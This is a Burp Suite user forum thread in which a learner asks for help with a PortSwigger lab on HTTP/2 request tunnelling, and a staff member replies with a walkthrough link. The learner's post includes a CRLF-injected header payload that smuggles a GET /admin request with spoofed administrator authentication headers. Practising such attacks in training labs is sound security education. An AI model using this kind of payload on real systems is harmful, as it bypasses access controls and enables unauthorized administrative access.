Research Academy
My account Customers About Blog Careers Legal Contact Resellers
The Burp Suite User Forum will be discontinued on the 1st November 2024.

Burp Suite User Forum

For support requests, go to the Support Centre. To discuss with other Burp users, head to our Discord page.

SUPPORT CENTRE DISCORD

Create new post

Lab: Bypassing access controls via HTTP/2 request tunnelling

Nordy | Last updated: Jun 01, 2023 02:27PM UTC

Up to point 8 - everything goes right! 8. Change the request method to HEAD and edit your malicious header so that it smuggles a request for the admin panel. Include the three client authentication headers, making sure to update their values as follows: Change the request method to HEAD - response 200 Change the :path to /login - response 200 update: Name foo: bar\r\n \r\n GET /admin HTTP/1.1\r\n X-SSL-VERIFIED: 1\r\n X-SSL-CLIENT-CN: administrator\r\n X-FRONTEND-KEY: 4915524682751556\r\n \r\n Value xyz response - 500 HTTP/2 500 Internal Server Error Content-Type: text/html; charset=utf-8 Content-Length: 125 <html><head><title>Server Error: Proxy error</title></head><body><h1>Server Error: Communication timed out</h1></body></html> Tried to do it a dozen times in different sequences The result is the same - response 500 Help please

Dominyque, PortSwigger Agent | Last updated: Jun 02, 2023 01:03PM UTC

Hi We have tested the lab and confirmed that it works as it should. Unfortunately, we do not have a community solution video for this lab yet; however, this video: https://www.youtube.com/watch?v=kg1aOiSvk6Q- did a great job walking through the steps.

You must be an existing, logged-in customer to reply to a thread. Please email us for additional support.